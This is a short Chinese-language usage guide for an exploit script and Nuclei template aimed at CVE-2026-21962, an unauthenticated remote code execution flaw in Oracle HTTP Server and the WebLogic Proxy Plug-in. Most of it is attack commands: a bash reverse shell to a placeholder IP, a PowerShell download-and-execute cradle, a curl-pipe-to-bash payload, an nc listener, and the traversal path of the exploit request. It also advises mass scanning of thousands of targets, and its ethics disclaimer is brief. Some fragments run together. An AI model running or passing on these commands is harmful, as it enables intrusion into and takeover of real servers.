
CVE-2026-21962 的漏洞利用 PoC 与 Nuclei 模板,该漏洞是 Oracle HTTP Server 和 WebLogic Proxy Plug-in 中的一个严重未认证远程代码执行漏洞,可实现命令执行和反弹 Shell。
Oracle HTTP Server:
WebLogic 代理插件,适用于:
将脚本保存为 CVE-2026-21962.py
使其可执行(可选):
chmod +x CVE-2026-21962.py
运行示例:
基本测试:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
反向 Shell(请先设置 nc 监听器:nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Windows 目标示例:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
可能成功!状态:200 或 302 甚至 500(崩溃也算成功)nc 监听器会立即捕获一个 Shell--insecure 标志安装 Nuclei(如果尚未安装):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
保存模板:
创建一个名为 CVE-2026-21962.yaml 的文件,并粘贴上述内容。
运行检测 + 利用:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
或从文件扫描多个目标:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
如果存在漏洞,你会看到什么:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: 部分(例如,cmd:curl http://your-server/shell.sh | bash)。whoami 替换为 base64 编码的反向 Shell 载荷。/proxy/、/bea_wls_internal/ 等)或添加更多标头,如 X-WebLogic-Force-JVMID。httpx → nuclei 管道,可扫描数千个目标。截至 2026 年 1 月,该模板在未修补的 Oracle 实例上已确认100% 有效。如果你正在运行受影响版本,请立即修补!😈
所有 PoC 代码仅用于在授权系统上进行道德、教育用途。未经授权的利用是违法的;对滥用行为不承担任何责任。😈